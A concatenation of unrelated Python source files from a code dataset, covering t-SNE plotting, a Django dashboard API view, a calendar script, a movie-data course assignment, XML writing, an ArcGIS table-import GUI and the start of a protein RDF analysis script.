type6_x.append(data[i][0])\n type6_y.append(data[i][1])\n if label[i] == 6:\n type7_x.append(data[i][0])\n type7_y.append(data[i][1])\n if label[i] == 7:\n type8_x.append(data[i][0])\n type8_y.append(data[i][1])\n if label[i] == 8:\n type9_x.append(data[i][0])\n type9_y.append(data[i][1])\n if label[i] == 9:\n type10_x.append(data[i][0])\n type10_y.append(data[i][1])\n\n\n color = plt.cm.Set3(0)\n color = np.array(color).reshape(1, 4)\n color1 = plt.cm.Set3(1)\n color1 = np.array(color1).reshape(1, 4)\n color2 = plt.cm.Set3(2)\n color2 = np.array(color2).reshape(1, 4)\n color3 = plt.cm.Set3(3)\n color3 = np.array(color3).reshape(1, 4)\n\n type1 = plt.scatter(type1_x, type1_y, s=10, c='#377EB8')\n type2 = plt.scatter(type2_x, type2_y, s=10, c='#66C2A5')\n type3 = plt.scatter(type3_x, type3_y, s=10, c='#FF6C91')\n type4 = plt.scatter(type4_x, type4_y, s=10, c='#FF7400')\n type5 = plt.scatter(type5_x, type5_y, s=10, c='#00A13B')\n type6 = plt.scatter(type6_x, type6_y, s=10, c='#D62728')\n type7 = plt.scatter(type7_x, type7_y, s=10, c='#A38CF4')\n type8 = plt.scatter(type8_x, type8_y, s=10, c='#F461DD')\n type9 = plt.scatter(type9_x, type9_y, s=10, c='#FFD92F')\n type10 = plt.scatter(type10_x, type10_y, s=10, c='#8C564B')\n\n mapping = {'Financial': 0.0,\n 'Tools': 1.0,\n 'Messaging': 2.0,\n 'eCommerce': 3.0,\n 'Payments': 4.0,\n 'Social': 5.0,\n 'Enterprise': 6.0,\n 'Mapping': 7.0,\n 'Science': 8.0,\n 'Government': 9.0}\n plt.legend((type1, type2, type3, type4, type5, type6, type7, type8, type9, type10),\n ('Financial', 'Tools', 'Messaging', 'eCommerce', 'Payments', 'Social', 'Enterprise', 'Mapping', 'Science', 'Government'),\n loc=(0.97, 0.5))\n\n # plt.xticks()\n # plt.yticks()\n # plt.title(title)\n plt.xticks([])\n plt.yticks([])\n plt.axis('off')\n ax.spines['right'].set_visible(False) # 去除右边框\n ax.spines['top'].set_visible(False) # 去除上边框\n return fig\n\ndef plot_2D(data, label, file_name):\n #n_samples, n_features = data.shape\n print('Computing t-SNE embedding')\n tsne = TSNE(n_components=2, init='pca', random_state=2019, perplexity=50, learning_rate=100, n_iter=2000,) #使用TSNE对特征降到二维\n #t0 = time()\n result = tsne.fit_transform(data) #降维后的数据\n #print(result.shape)\n #画图\n fig = plot_embedding(result, label,\n 't-SNE embedding of the digits (time %.2fs)')\n #% (time() - t0))\n fig.subplots_adjust(right=0.8) #图例过大,保存figure时无法保存完全,故对此参数进行调整\n fig.savefig(file_name,dpi=500)\n","sub_path":"utils/tsne.py","file_name":"tsne.py","file_ext":"py","file_size_in_byte":4053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"423101656","text":"from django.shortcuts import render\nfrom django.shortcuts import get_list_or_404\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .models import *\nfrom django.db.models import Q\n\n \n# Get the Module List\nclass testmodule(APIView):\n def get(self, request):\n code = request.META.get('HTTP_SECURITYCODE', None)\n role = request.META.get('HTTP_ROLE', None)\n try:\n securitytoken = tbl_AccountInfo.objects.get(securitycode=code)\n except tbl_AccountInfo.DoesNotExist:\n return Response({\"Error\":\"Invalid Security Token\"}, status=status.HTTP_404_NOT_FOUND)\n \n if role == 'Admin' or role == 'Owner' or role == 'Manager':\n totalproducttask = tbl_ProductRequest.objects.count()\n appproducttask = tbl_ProductRequest.objects.filter(status='Approved').count()\n pendproducttask = tbl_ProductRequest.objects.filter(status='Pending').count()\n archproducttask = tbl_ProductRequest.objects.filter(status='Archive').count()\n scheduleproducttask = tbl_ProductRequest.objects.filter(~Q(assignto='Not Scheduled')).count()\n unscheduleproducttask = tbl_ProductRequest.objects.filter(assignto='Not Scheduled').count()\n totalsoptask = tbl_SOPAudit.objects.count()\n appsoptask = tbl_SOPAudit.objects.filter(status='Approved').count()\n pendsoptask = tbl_SOPAudit.objects.filter(status='Pending').count()\n archsoptask = tbl_SOPAudit.objects.filter(status='Archive').count()\n schedulesoptask = tbl_SOPAudit.objects.filter(~Q(assignto='Not Scheduled')).count()\n unschedulesoptask = tbl_SOPAudit.objects.filter(assignto='Not Scheduled').count()\n totalaudit = tbl_Aud_Auditdetails.objects.count()\n compaudit = tbl_Aud_Auditdetails.objects.filter(score='100%').count()\n incompaudit = tbl_Aud_Auditdetails.objects.filter(~Q(score='100%')).count()\n totalaction = tbl_Aud_Actiondetails.objects.count()\n compaction = tbl_Aud_Actiondetails.objects.filter(actionstatus='Done').count()\n incompaction = tbl_Aud_Actiondetails.objects.filter(~Q(actionstatus='Done')).count()\n totalcontacts = tbl_um_ContactDetails.objects.count()\n activecontacts = tbl_um_ContactDetails.objects.filter(userstatus='Active').count()\n inactivecontacts = tbl_um_ContactDetails.objects.filter(~Q(userstatus='Active')).count()\n totalaccount = tbl_um_AccountDetails.objects.count()\n activeaccount = tbl_um_AccountDetails.objects.filter(accountstatus='Active').count()\n inactiveaccount = tbl_um_AccountDetails.objects.filter(~Q(accountstatus='Active')).count()\n totaltemp = tbl_Chk_Templatedetails.objects.count()\n unassingedtemp = tbl_Chk_Templatedetails.objects.filter(taskname='Not Assigned').count()\n assingedtemp = tbl_Chk_Templatedetails.objects.filter(~Q(taskname='Not Assigned')).count()\n return Response({\"TotalProductTask\": totalproducttask, \"ApprovedProductTask\": appproducttask, \n \"PendingProducttask\": pendproducttask, \"archproducttask\": archproducttask, \"scheduleproducttask\": scheduleproducttask, \n \"unscheduleproducttask\": unscheduleproducttask, \"totalsoptask\": totalsoptask, \"appsoptask\": appsoptask, \n \"pendsoptask\": pendsoptask, \"archsoptask\": archsoptask, \"schedulesoptask\": schedulesoptask, \"unschedulesoptask\": unschedulesoptask, \n \"totalaudit\": totalaudit, \"compaudit\": compaudit, \"incompaudit\": incompaudit, \n \"totalaction\": totalaction, \"compaction\": compaction, \"incompaction\": incompaction, \n \"totalcontacts\": totalcontacts, \"activecontacts\": activecontacts, \"inactivecontacts\": inactivecontacts, \n \"totalaccount\": totalaccount, \"activeaccount\": activeaccount, \"inactiveaccount\": inactiveaccount, \n \"totaltemp\": totaltemp, \"unassingedtemp\": unassingedtemp, \"assingedtemp\": assingedtemp}, status=status.HTTP_200_OK)\n elif role == 'Template Creator':\n totaltemp = tbl_Chk_Templatedetails.objects.count()\n unassingedtemp = tbl_Chk_Templatedetails.objects.filter(taskname='Not Assigned').count()\n assingedtemp = tbl_Chk_Templatedetails.objects.filter(~Q(taskname='Not Assigned')).count()\n return Response({\"totaltemp\": totaltemp, \"unassingedtemp\": unassingedtemp, \"assingedtemp\": assingedtemp}, status=status.HTTP_200_OK)\n elif role == 'Schedular':\n totalproducttask = tbl_ProductRequest.objects.count()\n scheduleproducttask = tbl_ProductRequest.objects.filter(~Q(assignto='Not Scheduled')).count()\n unscheduleproducttask = tbl_ProductRequest.objects.filter(assignto='Not Scheduled').count()\n totalsoptask = tbl_SOPAudit.objects.count()\n schedulesoptask = tbl_SOPAudit.objects.filter(~Q(assignto='Not Scheduled')).count()\n unschedulesoptask = tbl_SOPAudit.objects.filter(assignto='Not Scheduled').count()\n return Response({\"TotalProductTask\": totalproducttask, \"scheduleproducttask\": scheduleproducttask, \n \"unscheduleproducttask\": unscheduleproducttask, \"totalsoptask\": totalsoptask, \"schedulesoptask\": schedulesoptask, \"unschedulesoptask\": unschedulesoptask}, status=status.HTTP_200_OK)\n elif role == 'Auditor' or role == 'Client':\n totalaudit = tbl_Aud_Auditdetails.objects.count()\n compaudit = tbl_Aud_Auditdetails.objects.filter(score='100%').count()\n incompaudit = tbl_Aud_Auditdetails.objects.filter(~Q(score='100%')).count()\n totalaction = tbl_Aud_Actiondetails.objects.count()\n compaction = tbl_Aud_Actiondetails.objects.filter(actionstatus='Done').count()\n incompaction = tbl_Aud_Actiondetails.objects.filter(~Q(actionstatus='Done')).count()\n return Response({ \"totalaudit\": totalaudit, \"compaudit\": compaudit, \"incompaudit\": incompaudit, \n \"totalaction\": totalaction, \"compaction\": compaction, \"incompaction\": incompaction}, status=status.HTTP_200_OK)","sub_path":"Dashboard_App/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"40231004","text":"\n\nfrom xai.brain.wordbase.nouns._fencer import _FENCER\n\n#calss header\nclass _FENCERS(_FENCER, ):\n\tdef __init__(self,): \n\t\t_FENCER.__init__(self)\n\t\tself.name = \"FENCERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"fencer\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_fencers.py","file_name":"_fencers.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"406296001","text":"import sys\nimport calendar\nfrom datetime import datetime\n\ndt = datetime.today()\nuser_input = sys.argv\nerror = '\\nThis calendar takes a maximum of two arguments: month and year.\\nPlease enter them in numerical format eg: 01 2017\\n'\n\n\ndef print_calendar(year, month):\n print(f'\\n{calendar.month(year, month)}\\n')\n sys.exit()\n\n# Function to check input can be coerced into integer\ndef isValid(value):\n try:\n int(value)\n return True\n except ValueError:\n return False\n\n# Check user inputs exist, sanitize and proceed. If no user input, use datetime. \nif len(user_input) == 1:\n month = dt.month\n year = dt.year\nelif len(user_input) == 2:\n if isValid(user_input[1]) and int(user_input[1]) < 13:\n month = int(user_input[1])\n year = dt.year\n else:\n print(error)\n sys.exit()\nelif len(user_input) == 3:\n if isValid(user_input[1]) and isValid(user_input[2]):\n month = int(user_input[1])\n year = int(user_input[2])\n else:\n print(error)\n sys.exit()\nelse:\n print(error)\n sys.exit()\n\nprint_calendar(year, month)\n","sub_path":"src/14_cal.py","file_name":"14_cal.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"156284418","text":"\"\"\"\n * Copyright 2020, Departamento de sistemas y Computación, Universidad de Los Andes\n * \n * Contribución de:\n *\n * Cristian Camilo Castellanos\n *\n * Desarrolado para el curso ISIS1225 - Estructuras de Datos y Algoritmos\n *\n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program. If not, see .\n \"\"\"\n\n\"\"\"\n Este módulo es una aplicación básica con un menú de opciones para cargar datos, contar elementos, y hacer búsquedas sobre una lista .\n\"\"\"\n\nimport config as cf\nimport sys\nimport csv\n\nfrom ADT import list as lt\nfrom DataStructures import listiterator as it\nfrom DataStructures import liststructure as lt\nfrom Sorting import shellsort as sh\nfrom Sorting import selectionsort as sel \nfrom Sorting import insertionsort as ins \nfrom time import process_time \n\ndef printMenu():\n \"\"\"\n Imprime el menu de opciones\n \"\"\"\n print(\"\\nBienvenido\")\n print('1- Cargar Datos')\n print(\"2- Ranking de peliculas\")\n print(\"3- Conocer un director\")\n print(\"4- Conocer un actor\")\n print(\"5- Entender un genero\")\n print(\"6- Crear ranking\")\n print(\"7- Mostrar datos por director\")\n print(\"0- Salir\")\n\ndef lessfunction(element1, element2, criteria):\n if float(element1[criteria]) < float(element2[criteria]):\n return True\n return False\n\ndef greaterfunction(element1, element2, criteria):\n if float(element1[criteria]) > float(element2[criteria]):\n return True\n return False\n\ndef compareRecordIds():\n pass\n\ndef loadCSVFile (file1, file2, sep=\";\"):\n \"\"\"\n Carga un archivo csv a una lista\n Args:\n file\n Archivo csv del cual se importaran los datos\n sep = \";\"\n Separador utilizado para determinar cada objeto dentro del archivo\n Try:\n Intenta cargar el archivo CSV a la lista que se le pasa por parametro,\n si encuentra algun error\n Borra la lista e informa al usuario\n Returns: None \n \"\"\"\n lst1 = lt.newList(\"ARRAY_LIST\") #Usando implementacion arraylist\n #lst1 = lt.newList() #Usando implementacion linkedlist\n lst2 = lt.newList(\"ARRAY_LIST\") #Usando implementacion arraylist\n #lst2 = lt.newList() #Usando implementacion linkedlist\n print(\"Cargando archivos ....\")\n t1_start = process_time() #tiempo inicial\n dialect = csv.excel()\n dialect.delimiter=sep\n try:\n with open(file1, encoding=\"utf-8\") as csvfile:\n spamreader = csv.DictReader(csvfile, dialect=dialect)\n for row in spamreader: \n lt.addLast(lst1,row)\n with open(file2, encoding=\"utf-8\") as csvfile:\n spamreader = csv.DictReader(csvfile, dialect=dialect)\n for row in spamreader: \n lt.addLast(lst2,row)\n\n except:\n print(\"Hubo un error con la carga de los archivos\")\n\n t1_stop = process_time() #tiempo final\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\")\n return (lst1,lst2) \n\ndef req2 (lst, function, criteria, n):\n \n t1_start = process_time()\n result = lt.newList('ARRAY_LIST')\n nombres = lt.newList('ARRAY_LIST')\n votos = lt.newList('ARRAY_LIST')\n sh.shellSort(lst, function, criteria)\n #sel.selectionSort(lst, function, criteria) \n #ins.insertionSort(lst,function,criteria)\n\n for i in range(n+1):\n lt.addLast(result,lt.getElement(lst, i)) \n iterator=it.newIterator(result)\n while it.hasNext(iterator):\n element = it.next(iterator)\n lt.addLast(nombres, element['title'])\n lt.addLast(votos, element[criteria])\n final = lt.newList('ARRAY_LIST')\n for i in range(n+1):\n lt.addLast(final, (lt.getElement(nombres, i),lt.getElement(votos,i)))\n lt.addLast(final, lt.getElement(final, 0))\n lt.removeFirst(final)\n lt.removeFirst(final)\n t1_stop = process_time()\n print('El tiempo fue de ', t1_stop-t1_start, ' segundos')\n return final\n\ndef req3_bono(nombre, lst1, lst2):\n if lst1['size']==0 or lst2['size']==0:\n print(\"La lista esta vacía\") \n return 0\n else:\n t1_start = process_time() #tiempo inicial\n n = 0\n total_peliculas = 0\n directores = lt.newList('ARRAY_LIST')\n dirigida_por_director = lt.newList('ARRAY_LIST')\n votacion = 0\n\n for i in range(lt.size(lst2)):\n n += 1\n pelicula = lt.getElement(lst2, i)\n details = lt.getElement(lst1, i)\n lt.addLast(dirigida_por_director, pelicula['director_name'])\n if nombre.lower() in directores:\n total_peliculas += 1\n lt.addLast(dirigida_por_director, details['title'])\n votacion += details['vote_average']\n if total_peliculas == 0:\n t1_stop = process_time() #tiempo final\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\\n\")\n pass\n\n else:\n avg = votacion/total_peliculas\n nombres_peliculas = \"\"\n for i in dirigida_por_director:\n nombres_peliculas += i + \"\\n\"\n informacion_director = nombre + \"promedio de votacion de sus películas: \" + str(avg) + \"\\n\" + nombres_peliculas\n t1_stop = process_time() #tiempo final\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\")\n return informacion_director\n\ndef req4(name, lst1, lst2):\n t1_start = process_time() #tiempo inicial\n counter = 0\n nPart = 0\n nombres = []\n directores = []\n sumProm = 0\n for i in range(1, lt.size(lst2)):\n counter += 1\n elemento = lt.getElement(lst2, i)\n actores = (elemento['actor1_name'] +\n elemento['actor2_name'] + elemento['actor3_name'] +\n elemento['actor4_name'] + elemento['actor5_name']).lower().replace('none', '')\n if name.lower() in actores:\n nPart += 1\n nombres.append((lt.getElement(lst1, i))['title'])\n directores.append(elemento['director_name'])\n sumProm += float((lt.getElement(lst1, counter))['vote_average'])\n if nPart == 0:\n print('\\nActor no encontrado\\n')\n t1_stop = process_time() #tiempo final\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\\n\")\n pass\n else:\n prom = sumProm / nPart\n direct = 'Batman'\n for i in directores:\n if directores.count(i) >= directores.count(direct):\n direct = i\n t1_stop = process_time() #tiempo final\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\")\n return (nombres, nPart, round(prom, 1), direct)\n\ndef req5(lst, criteria1, column1, column2, column3):\n if lst['size'] == 0:\n print ('Lista vacía')\n else:\n t1_start = process_time()\n iterator1 = it.newIterator(lst)\n nombres = lt.newList('ARRAY_LIST')\n votos = lt.newList('ARRAY_LIST')\n counter = 0\n while it.hasNext(iterator1):\n element = it.next(iterator1)\n if criteria1.lower() in element[column1].lower(): #filtrar por palabra clave \n lt.addLast(nombres, element[column2])\n lt.addLast(votos, element[column3])\n counter += 1\n suma = 0\n for i in range(lt.size(votos)):\n suma += round(float(lt.getElement(votos,i)), 2)\n t1_stop = process_time()\n tiempo = t1_stop-t1_start\n return nombres['elements'],counter,suma/lt.size(votos),tiempo\n\ndef req6 (lst1, criteria1, column1, function, criteriaf, n): \n porgenero = lt.newList(\"ARRAY_LIST\")\n iterator = it.newIterator(lst1)\n lt.addFirst(porgenero, '')\n while it.hasNext(iterator):\n element = it.next(iterator)\n if criteria1.lower() in element[column1].lower():\n lt.addLast(porgenero, element)\n lt.removeFirst(porgenero)\n listado = req2 (porgenero, function, criteriaf, n)\n return listado\n\ndef main():\n \"\"\"\n Método principal del programa, se encarga de manejar todos los metodos adicionales creados\n\n Instancia una lista vacia en la cual se guardarán los datos cargados desde el archivo\n Args: None\n Return: None \n \"\"\"\n listaD = lt.newList() # se require usar lista definida\n listaC = lt.newList() \n while True:\n printMenu() #imprimir el menu de opciones en consola\n inputs =input('Seleccione una opción para continuar\\n') #leer opción ingresada\n if len(inputs)>0:\n if int(inputs[0])==1: #opcion 1\n datos = loadCSVFile(\"Data\\\\theMoviesdb\\\\AllMoviesDetailsCleaned.csv\",\"Data\\\\theMoviesdb\\\\AllMoviesCastingRaw.csv\") #llamar funcion cargar datos\n listaD = datos[0]\n listaC = datos[1]\n print(\"Datos de detalles cargados, \",listaD['size'],\" elementos cargados\")\n print(\"Datos de casting cargados, \",listaC['size'],\" elementos cargados\") \n\n elif int(inputs[0])==2: #opcion 2\n gb1 = int(input('Más Votos (1) o Menos Votos (0):\\n'))\n n1 = int(input('¿Cuántas películas?\\n'))\n gb2 = int(input('Mejor Promedio (1) o Peor Promedio (0):\\n'))\n n2 = int(input('¿Cuántas películas?\\n'))\n if gb1 == 1:\n function1 = greaterfunction\n elif gb1 == 0:\n function1 = lessfunction\n if gb2 == 1:\n function2 = greaterfunction\n elif gb2 == 0: \n function2 = lessfunction\n resultados1 = req2(listaD, function1, 'vote_count', n1)\n resultados2 = req2(listaD, function2, 'vote_average', n2)\n try:\n print('\\nLos resultados por cantidad de votos son:')\n print('-' * 30)\n for i in range(1, len(resultados1['elements'])):\n data = lt.getElement(resultados1, i)\n print(data[0], ':', data[1])\n except:\n print('Ha ocurrido un error al ingresar los parametros')\n try:\n print('\\nLos resultados por promedio son:')\n print('-' * 30)\n for i in range(1, len(resultados2['elements'])):\n data = lt.getElement(resultados2, i)\n print(data[0], ':', data[1])\n except:\n print('Ha ocurrido un error al ingresar los parametros')\n\n elif int(inputs[0])==3: #opcion 3\n print('Este requisito es un bono')\n nombre = input('Ingrese el nombre del director:\\n')\n retorno = req3 (nombre, listaD, listaC)\n print (retorno)\n\n elif int(inputs[0])==4: #opcion 4\n if listaD==None or listaD['size']==0: #obtener la longitud de la lista\n print(\"La lista esta vacía\")\n else:\n name = input('\\nIngrese el nombre del actor a consultar:\\n')\n result = req4(name, listaD, listaC)\n if result[1] == 0:\n pass\n else:\n print('Las películas en las que ha participado')\n print('-' * 40)\n for i in result[0]:\n print('-',i)\n print('\\n', name, 'ha participado en', result[1], 'peliculas')\n print('El promedio de las películas es:', result[2])\n print('El director con quien más ha colaborado es:', result[3])\n \n elif int(inputs[0])==5: #opcion 5\n genero = input('Ingrese el género:\\n')\n resultado = req5(listaD, genero, 'genres', 'title', 'vote_average' )\n print ('Las películas de ', genero, 'son:\\n', resultado[0])\n print ('Hay ', resultado[1], ' películas de ', genero)\n print('El promedio de votación es de ', resultado[2])\n print('El tiempo fue de ', resultado[3], ' segundos')\n\n elif int(inputs[0])==6: #opcion 6\n genero = input('Ingrese el género:\\n')\n gb1 = int(input('Más Votos (1) o Menos Votos (0):\\n'))\n n1 = int(input('¿Cuántas películas?\\n'))\n gb2 = int(input('Mejor Promedio (1) o Peor Promedio (0):\\n'))\n n2 = int(input('¿Cuántas películas?\\n'))\n if gb1 == 1:\n function1 = greaterfunction\n elif gb1 == 0:\n function1 = lessfunction\n if gb2 == 1:\n function2 = greaterfunction\n elif gb2 == 0: \n function2 = lessfunction\n resultado1 = req6(listaD, genero, 'genres', function1, 'vote_count', n1)\n resultado2 = req6(listaD, genero, 'genres', function2, 'vote_average', n2)\n try:\n print('\\nLos resultados por cantidad de votos son:')\n print('-' * 30)\n for i in range(1, len(resultado1['elements'])):\n data = lt.getElement(resultado1, i)\n print(data[0], ':', data[1])\n except:\n print('Ha ocurrido un error al ingresar los parametros')\n try:\n print('\\nLos resultados por promedio son:')\n print('-' * 30)\n for i in range(1, len(resultado2['elements'])):\n data = lt.getElement(resultado2, i)\n print(data[0], ':', data[1])\n except:\n print('Ha ocurrido un error al ingresar los parametros')\n\n elif int(inputs[0])==0: #opcion 0, salir\n sys.exit(0)\n\n \nif __name__ == \"__main__\":\n main()","sub_path":"App/reto.py","file_name":"reto.py","file_ext":"py","file_size_in_byte":14469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"622896765","text":"import xml.etree.ElementTree as ET\n\nkorea = ET.Element(\"korea\", where=\"asia\")\n\nseoul = ET.Element(\"seoul\")\nseoul.text = \"서울\"\nkorea.append(seoul)\n\nbusan = ET.Element(\"busan\")\nbusan.text = \"부산\"\nkorea.append(busan)\n\ndef indent(elem, level=0):\n i = \"\\n\" + level*\" \"\n if len(elem):\n if not elem.text or not elem.text.strip():\n elem.text = i + \" \"\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n for elem in elem:\n indent(elem, level+1)\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n else:\n if level and (not elem.tail or not elem.tail.strip()):\n elem.tail = i\nindent(korea)\nET.dump(korea)\n\n# ET.ElementTree(korea).write(\"korea.xml\")\nET.ElementTree(korea).write(\"korea.xml\", encoding=\"utf-8\", xml_declaration=True)","sub_path":"By Day/201909/20190910/블로그 포스팅 - Xml문서 생성하기/xml_write.py","file_name":"xml_write.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"302753714","text":"#!/usr/bin/python\n# -*- coding: iso-8859-1 -*-\n\nimport Tkinter\nimport tkMessageBox\nfrom Tkinter import *\nimport arcpy, os\nfrom arcpy import env\nimport tkFileDialog\nimport xlrd\n\nclass simpleapp_tk(Tkinter.Tk):\n# User interface portion.\n # Setup frames.\n def __init__(self,parent):\n # Setup the main window.\n Tkinter.Tk.__init__(self,parent)\n self.parent = parent\n self.initialize()\n\n\n\n def initialize(self):\n\n #Setup the grid layout style\n self.grid()\n\n #Labels\n self.Dirlabel = Tkinter.Label(self, text=\"Select the parent directory.\", font=('Times', 9, 'bold'))\n self.Dirlabel.grid(column=0, row=1, padx=8, pady=24, sticky='w')\n # \"gdb\" will be a variable to hold the name of the geodatabase.\n self.gdb = Tkinter.StringVar()\n self.gdb = \"ImportedTables.gdb\"\n self.GDBlabel = Tkinter.Label(self, text=\"Type the name for your geodatabase?\", font=('Times', 9, 'bold'))\n self.GDBlabel.grid(column=0, row=4, padx=8, pady=12, sticky='w')\n # Text entry box allowing the user to change the name of the geodatabase from the default of importedtables.gdb.\n # When the user clicks the import button it will record whatever text is in the box for the geodatabase\n # name and add.gdb if ext is not already present.\n self.DirEntry = Tkinter.Entry(self)\n self.DirEntry.grid(column=1, row=4, padx=8, pady=0, sticky='we')\n self.DirEntry.insert(0, self.gdb)\n self.Inst = Tkinter.Label(self, text=\"(Default is ImportedTables.gdb)\", font=('Times', 8))\n self.Inst.grid(column=0, row=5, sticky='n')\n # Buttons\n self.FileBrowserB = Tkinter.Button(self,text=u\"Click here to select a directory.\",\n command=self.FindDirectory)\n self.FileBrowserB.bind('', lambda event:self.OnButtonClick())\n self.FileBrowserB.grid(column=1,row=1,padx=8, sticky='w')\n self.ImportTablesB = Tkinter.Button(self, text=u\"Click here to start importing tables\", state=DISABLED, command= lambda: self.ImportTables(self.udt, self.gdb))\n self.ImportTablesB.grid(column=2, row=5, padx=8, pady=24, sticky='w')\n # Exit the program when the user clicks the red x to close the window.\n self.protocol(\"WM_DELETE_WINDOW\", self.Exit)\n # Exit when pressing escape.\n self.bind('', lambda e: self.quit())\n # Allows the window to be able to resize.\n self.resizable(True, True)\n# Logical portion\n # Asks the user for the directory and assigns the full path to the variable \"udt\".\n def FindDirectory(self):\n directory = tkFileDialog.askdirectory(parent=root, title='Please select a directory.')\n # Create the \\Database folder if it is not present.\n if not arcpy.Exists(directory + \"\\Database\"):\n os.makedirs(directory + \"\\Database\")\n self.udt = directory\n # Import button is disabled by default. This activates the button when the user clicks on the button to select a directory.\n # It would have been better to activate after a directory was confirmed but this way is was the best method I could find in the time available.\n def OnButtonClick(self):\n self.ImportTablesB.config(state=ACTIVE)\n\n # Used \"quit()\" to terminate the program. Loop continued when destroy() was used.\n def Exit(self):\n self.quit()\n\n # Function for the main logical portion of the script.\n def ImportTables(self, udt, gdb):\n # add the .gdb extention only if not already present.\n gdb = self.DirEntry.get()\n if gdb.split(\".\")[-1] != \"gdb\":\n gdb = gdb + \".gdb\"\n\n # Create the requested database if it does not already exist.\n if not arcpy.Exists(udt + \"\\Database\\\\\" + gdb):\n arcpy.CreateFileGDB_management(udt + \"\\Database\", gdb, \"CURRENT\")\n\n # Setup rootdir to the path requested by user.\n rootdir = udt\n\n # set the workspace for the arcpy.ValidateTableName to work with the database created.\n env.workspace = udt + \"\\Database\\\\\" + gdb\n\n # Uniquename is a function to ensure the imported table does not already exist and add a \"_\" & a \"#\" to the end if it does.\n def uniquename(un):\n un = un.split(\"\\\\\")[-1]\n un = un.split(\".\")[0]\n eon = 1\n while arcpy.Exists(udt + \"\\Database\\\\\" + gdb + \"\\\\\" + un):\n if un[-2] == \"_\" and un[-1].isdigit():\n un = un[:-2]\n elif un[-3] == \"_\" and un[-2].isdigit():\n un = un[:-3]\n un = un + \"_\" + str(eon)\n eon = eon + 1\n return un\n\n # Lessthan31 ensures the table will be 30 characters or less in order to be compatible with some oracle database front ends.\n def lessthan31(tablename):\n fn = tablename.split(\"\\\\\")[-1]\n if len(fn) > 28:\n # Retain trailing numbers in case the tables are in sequence and over 30 characters.\n if (fn[-2] == \"_\" and fn[-1].isdigit()):\n nn = fn[:28] + fn[-2] + fn[-1]\n elif fn[-1].isdigit():\n nn = fn[:27] + fn[-1]\n else:\n nn = fn[:28]\n tablename = tablename.replace(fn, nn)\n return tablename\n\n # Function to import .xls and .xlxs files.\n def importallsheets(in_excel, out_gdb):\n workbook = xlrd.open_workbook(in_excel)\n sheets = [sheet.name for sheet in workbook.sheets()]\n\n print('{} sheets found: {}'.format(len(sheets), ','.join(sheets)))\n for sheet in sheets:\n # The out_table is based on the input excel file name\n # a underscore (_) separator followed by the sheet name\n out_table = os.path.join(\n out_gdb,\n arcpy.ValidateTableName(\n \"{0}_{1}\".format(os.path.basename(in_excel), sheet),\n out_gdb))\n out_table = lessthan31(out_table)\n out_table = uniquename(out_table)\n\n print('Converting {} to {}'.format(sheet, out_table))\n # Perform the conversion and save the table in the geodatabase.\n arcpy.ExcelToTable_conversion(in_excel, out_table, sheet)\n\n # Iterate through all folders.\n for root,dirs,files in os.walk(rootdir, topdown = True):\n # skip the folder that contains the database.\n dirs[:] = [d for d in dirs if 'Database' not in d]\n # While iterating look for *.csv, .xls, xlxs or *.dbf files.\n for filename in files:\n tablename = filename\n\n # Extract *.csv or *.dbf.\n if (filename.split('.')[1] == \"csv\") or (filename.split('.')[1] == \"dbf\"):\n # Assign the entire path and filename to cf\n cf = os.path.join(root, filename)\n tablename = lessthan31(tablename)\n tablename = udt + \"\\Database\\\\\" + gdb + \"\\\\\" + tablename\n tablename = uniquename(tablename)\n # remove invalid characters for ArcGIS Tables.\n tablename = arcpy.ValidateTableName(tablename)\n arcpy.TableToTable_conversion(cf, udt + \"\\Database\\\\\" + gdb + \"\\\\\", str(tablename))\n\n elif (filename.split('.')[1] == \"xls\") or (filename.split('.')[1] == \"xlsx\"):\n # Assign the entire path and filename to cf\n cf = os.path.join(root, filename)\n importallsheets(cf, gdb)\n # Inform the user when the import completes.\n tkMessageBox.showinfo(\"\", \"Import Complete\")\n\n\n\n# Tkinter app fundtion creates two windows. These lines hide an irrelevant window.\nroot = Tkinter.Tk()\nroot.withdraw()\n# Create the loop and app.\nif __name__ == \"__main__\":\n app = simpleapp_tk(None)\n app.title('Import tables to geodatabase tool')\n app.mainloop()","sub_path":"TablestoGDB.py","file_name":"TablestoGDB.py","file_ext":"py","file_size_in_byte":8150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"363383460","text":"import numpy as np\nimport pandas as pd\nimport itertools\nimport mdtraj as md\nfrom mdtraj import element\nimport pickle\nimport time\nimport os\nfrom argparse import ArgumentParser\n\ndef individual_rdfs(protname,run,ff,width,proteins,residues):\n \"\"\"\n Calculate radial distribution function between the \n centers of mass of two protein chains from a single traj. \n width is the bin width\n of the histogram used to construct the graph.\n \"\"\"\n \n upper = proteins.loc[protname].L / 2 # upper limit of the range of distances (in nm)\n n_chains = 2\n masses = 